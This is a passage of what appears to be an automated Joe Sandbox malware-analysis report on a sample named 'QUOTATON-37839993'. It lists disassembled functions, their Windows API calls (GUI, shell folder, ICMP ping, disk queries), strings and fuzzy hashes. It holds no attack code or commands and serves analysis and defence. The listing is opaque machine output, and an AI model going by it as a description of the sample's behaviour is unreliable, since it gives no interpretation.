                                                                      • Instruction Fuzzy Hash: EC11E231E9022979D720B661DC4ADFFBBBCEBD1F88F40242AB441B21D4EEA01C44C6A0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 208665112-3771769585
                                                                      • Opcode ID: afe6e1b46165df2bff85772506ded12423fe1b14b6b2056b542b71d5eca66473
                                                                      • Instruction ID: fc36cef5c50fa057dafec598445c08f288c5cf8e57cb4e25c066456ef9cf9920
                                                                      • Opcode Fuzzy Hash: afe6e1b46165df2bff85772506ded12423fe1b14b6b2056b542b71d5eca66473
                                                                      • Instruction Fuzzy Hash: 5F11D271500118AFDB24AB70BC4AEEA77BCEB02761F0411BAF54AB60D1EF719AC58B50
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00E64F7A
                                                                        • Part of subcall function 00E2049F: timeGetTime.WINMM(?,7694B400,00E10E7B), ref: 00E204A3
                                                                      • Sleep.KERNEL32(0000000A), ref: 00E64FA6
                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00E64FCA
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E64FEC
                                                                      • SetActiveWindow.USER32 ref: 00E6500B
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E65019
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E65038
                                                                      • Sleep.KERNEL32(000000FA), ref: 00E65043
                                                                      • IsWindow.USER32 ref: 00E6504F
                                                                      • EndDialog.USER32(00000000), ref: 00E65060
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 494bd53378bc9ac89b715dedc5a561acca11afc354a8c45330f8395fd98664db
                                                                      • Instruction ID: 54e9b07d24085a006b337a497e5df9310ff21dcc6b3ec5c7c8345c9a79baaa99
                                                                      • Opcode Fuzzy Hash: 494bd53378bc9ac89b715dedc5a561acca11afc354a8c45330f8395fd98664db
                                                                      • Instruction Fuzzy Hash: 04219F71380605AFE7105F32FC88E263BBAEF04789F243434F10AB11B1DB628D599B61
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • CoInitialize.OLE32(00000000), ref: 00E6D5EA
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E6D67D
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00E6D691
                                                                      • CoCreateInstance.OLE32(00E92D7C,00000000,00000001,00EB8C1C,?), ref: 00E6D6DD
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E6D74C
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00E6D7A4
                                                                      • _memset.LIBCMT ref: 00E6D7E1
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00E6D81D
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E6D840
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00E6D847
                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E6D87E
                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00E6D880
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                      • String ID:
                                                                      • API String ID: 1246142700-0
                                                                      • Opcode ID: b4c32760586394f6a31868ba44c10e30fee54376d5fc4862302f22bb0d761e20
                                                                      • Instruction ID: 99ec9da7c3f4f04a260330732281758af17cae51c8ae5c7bf4d0fc7475413d2f
                                                                      • Opcode Fuzzy Hash: b4c32760586394f6a31868ba44c10e30fee54376d5fc4862302f22bb0d761e20
                                                                      • Instruction Fuzzy Hash: E4B1FA75A00109AFDB04DFA4DC88DAEBBF9FF48314B1494A9E909EB261DB30ED45CB50
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00E5C283
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E5C295
                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E5C2F3
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00E5C2FE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E5C310
                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E5C364
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E5C372
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E5C383
                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E5C3C6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E5C3D4
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E5C3F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5C3FE
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                                                                      • Instruction ID: abd8c250e595ef0103abace67ada889e08d6e1be89cd1f33f7740804e736f2c2
                                                                      • Opcode Fuzzy Hash: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                                                                      • Instruction Fuzzy Hash: 61518471B00305AFDB08CFA9DD99A6DBBB5EF88311F24852DF919E7290D7709D448B50
                                                                      APIs
                                                                        • Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A
                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E020D3
                                                                      • KillTimer.USER32(-00000001,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E0216E
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00E3BCA6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BCD7
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BCEE
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BD0A
                                                                      • DeleteObject.GDI32(00000000), ref: 00E3BD1C
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: e8be131b588f9ab8422d220ca53a57cfad7e1cf39fecff62815900fa5fe4ca9c
                                                                      • Instruction ID: 3fd61a0dfc964df5d069ff30dc995fd3d6758c4775dee871169619a84e9126fa
                                                                      • Opcode Fuzzy Hash: e8be131b588f9ab8422d220ca53a57cfad7e1cf39fecff62815900fa5fe4ca9c
                                                                      • Instruction Fuzzy Hash: F8616A32101B00DFDB299F15C94CB26BBF1FB4031AF50652DE646BA9A0C772A8D6DB90
                                                                      APIs
                                                                        • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                                                                      • GetSysColor.USER32(0000000F), ref: 00E021D3
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: e314c40249a19f861c89d71a02e61d98ef19a267e455a3278e661734371a07d8
                                                                      • Instruction ID: 2e1a6fd118e24f69a4cd38038107775d752c571a3cbd8daa456b4dd0bbba22c3
                                                                      • Opcode Fuzzy Hash: e314c40249a19f861c89d71a02e61d98ef19a267e455a3278e661734371a07d8
                                                                      • Instruction Fuzzy Hash: A441B031000140AFDB255FA9EC8CBB93BA5EB56325F145269FF65AA1F2C7318CC6DB21
APIs
• CharLowerBuffW.USER32(?,?,00E8F910), ref: 00E6A90B
• GetDriveTypeW.KERNEL32(00000061,00EB89A0,00000061), ref: 00E6A9D5
• _wcscpy.LIBCMT ref: 00E6A9FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 718b028a524a9e250e9bf7d6e65e098d26a927f901cd439aa5ce0182e34c05f0
• Instruction ID: e9b2c1b5f8fa08a3a4e374f4363d08845234b5c5343d11044593b73b12dd4957
• Opcode Fuzzy Hash: 718b028a524a9e250e9bf7d6e65e098d26a927f901cd439aa5ce0182e34c05f0
• Instruction Fuzzy Hash: 3A519A315483009BC710EF14E992AAFB7E5AFC4384F586829F49A772E2DB319949CB52
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: c52f22ee335cf845aef7120a40d64f99088a6934138ee09169303deb68ba3981
• Instruction ID: 90cdddea63ff453148f4ff84b449dceb08940bd0b9da272059d8d205b3983b5a
• Opcode Fuzzy Hash: c52f22ee335cf845aef7120a40d64f99088a6934138ee09169303deb68ba3981
• Instruction Fuzzy Hash: 4341A471904205AFDB28DF74E846AB677E8EF45304F20646EE54AF6293EA359D41CB20
APIs
• _memset.LIBCMT ref: 00E8716A
• CreateMenu.USER32 ref: 00E87185
• SetMenu.USER32(?,00000000), ref: 00E87194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87221
• IsMenu.USER32(?), ref: 00E87237
• CreatePopupMenu.USER32 ref: 00E87241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E8726E
• DrawMenuBar.USER32 ref: 00E87276
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 42efd9cadb8efa6074da961891addad117f968ee380fec3ecb26d1acd6835e64
• Instruction ID: 6e3b8ab459355312451d90d8b5f6ddfbf63192bef7aba0f32a9821f76ed6d4b7
• Opcode Fuzzy Hash: 42efd9cadb8efa6074da961891addad117f968ee380fec3ecb26d1acd6835e64
• Instruction Fuzzy Hash: FD4136B5A01205EFDB20EFA5D988E9ABBB5FF49310F240029F959B7361D731AD14CB90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E8755E
• CreateCompatibleDC.GDI32(00000000), ref: 00E87565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E87578
• SelectObject.GDI32(00000000,00000000), ref: 00E87580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00E8758B
• DeleteDC.GDI32(00000000), ref: 00E87594
• GetWindowLongW.USER32(?,000000EC), ref: 00E8759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E875B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E875BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 45063b85c19d4ff5c54cc66772cb455591d0cf9e7343768dd497f9633a4f238e
• Instruction ID: 8f1767eb87a5818bd2c123783cd6a4b2a6d45dfacd53d227b6018d83bf7124ee
• Opcode Fuzzy Hash: 45063b85c19d4ff5c54cc66772cb455591d0cf9e7343768dd497f9633a4f238e
• Instruction Fuzzy Hash: 6C318A32104214AFDF11AFA5DC08FDA3BA9EF09325F201224FA5DB60A0C731D825DBA0
APIs
• _memset.LIBCMT ref: 00E26E3E
  • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
• __gmtime64_s.LIBCMT ref: 00E26ED7
• __gmtime64_s.LIBCMT ref: 00E26F0D
• __gmtime64_s.LIBCMT ref: 00E26F2A
• __allrem.LIBCMT ref: 00E26F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E26F9C
• __allrem.LIBCMT ref: 00E26FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E26FD1
• __allrem.LIBCMT ref: 00E26FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27006
• __invoke_watson.LIBCMT ref: 00E27077
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: b488bebfbb111d7018eca14517fc75ebf16056d50408d6054bd0a87d11416983
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: 1C71E576A00726ABEB14AE78EC41B5AB7E8AF04724F145229F554F72C1E770EE448790
APIs
• _memset.LIBCMT ref: 00E62542
• GetMenuItemInfoW.USER32(00EC5890,000000FF,00000000,00000030), ref: 00E625A3
• SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E625D9
• Sleep.KERNEL32(000001F4), ref: 00E625EB
• GetMenuItemCount.USER32(?), ref: 00E6262F
• GetMenuItemID.USER32(?,00000000), ref: 00E6264B
• GetMenuItemID.USER32(?,-00000001), ref: 00E62675
• GetMenuItemID.USER32(?,?), ref: 00E626BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E62700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62735
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: f24e5b4db8c437f63af6ebc9ccd4dd0c5274cab03d94ba251bac90775ad0b6ca
• Instruction ID: 1c57bcf63d1382f1732a6006876357f79646624a9d7419ad8e563b66e7d77876
• Opcode Fuzzy Hash: f24e5b4db8c437f63af6ebc9ccd4dd0c5274cab03d94ba251bac90775ad0b6ca
• Instruction Fuzzy Hash: 7161A3B0940A49AFDB11CFA4EC84DFE7BB8EB01388F14516DEA42B7291D731AD05DB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E86FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E86FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00E86FCC
• _memset.LIBCMT ref: 00E86FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E86FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E87067
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 7145c77c3167b3b7b7e20358bd0a1c692662680fe33aab7a6d7b4ff02139b1d2
• Instruction ID: d187e2eb85db1b00e7f292d16a4b075f0a9c5adc5beaee0cec79aca1c6549d5a
• Opcode Fuzzy Hash: 7145c77c3167b3b7b7e20358bd0a1c692662680fe33aab7a6d7b4ff02139b1d2
• Instruction Fuzzy Hash: 9C617D71900208AFDB10DFA4CD85EEE77F8EB09714F24116AFA18BB2A1C771AD45DB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E56BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00E56C18
• VariantInit.OLEAUT32(?), ref: 00E56C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00E56C4A
• VariantCopy.OLEAUT32(?,?), ref: 00E56C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00E56CB1
• VariantClear.OLEAUT32(?), ref: 00E56CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00E56CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E56CDC
• VariantClear.OLEAUT32(?), ref: 00E56CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E56CF9
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 6b2b851462f17b2f3d614f24a0cf025dfa17ecbf62ff89223fc07a7d1a4268cb
• Instruction ID: 792cdebcf246f8b85fc771d762164040473971cca850dc8f62b8ea86bbcdeabd
• Opcode Fuzzy Hash: 6b2b851462f17b2f3d614f24a0cf025dfa17ecbf62ff89223fc07a7d1a4268cb
• Instruction Fuzzy Hash: F2415F71A002199FCF04DFA9D8449AEBBB9EF08355F408469E955F7261CB30A949CFA0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00E75793
• inet_addr.WSOCK32(?,?,?), ref: 00E757D8
• gethostbyname.WSOCK32(?), ref: 00E757E4
• IcmpCreateFile.IPHLPAPI ref: 00E757F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E758ED
• WSACleanup.WSOCK32 ref: 00E758F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 6e54ea16fefab3804631209a23a6ba823f13c6912479bc176ca704ac2d6f7a80
• Instruction ID: 1089142df7f488e525e29ff92442acce0600d8f5cb9f945de18c2b2de80e6618
• Opcode Fuzzy Hash: 6e54ea16fefab3804631209a23a6ba823f13c6912479bc176ca704ac2d6f7a80
• Instruction Fuzzy Hash: 36518F326007009FE7149F65DC45B6AB7E4AF48714F149929F95AFB2A1DB70E844CF42
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6B4D0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E6B546
                                                                      • GetLastError.KERNEL32 ref: 00E6B550
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00E6B5BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E59014
                                                                      • GetDlgCtrlID.USER32 ref: 00E5901F
                                                                      • GetParent.USER32 ref: 00E5903B
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E5903E
                                                                      • GetDlgCtrlID.USER32(?), ref: 00E59047
                                                                      • GetParent.USER32(?), ref: 00E59063
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59066
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E590FD
                                                                      • GetDlgCtrlID.USER32 ref: 00E59108
                                                                      • GetParent.USER32 ref: 00E59124
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59127
                                                                      • GetDlgCtrlID.USER32(?), ref: 00E59130
                                                                      • GetParent.USER32(?), ref: 00E5914C
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E5914F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00E5916F
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E59184
                                                                      • _wcscmp.LIBCMT ref: 00E59196
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E59211
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1704125052-3381328864
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E67A6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ArraySafeVartype
                                                                      • String ID:
                                                                      • API String ID: 1725837607-0
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E0FAA6
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00E0FB45
                                                                      • UnregisterHotKey.USER32(?), ref: 00E0FC9C
                                                                      • DestroyWindow.USER32(?), ref: 00E445D6
                                                                      • FreeLibrary.KERNEL32(?), ref: 00E4463B
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E44668
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
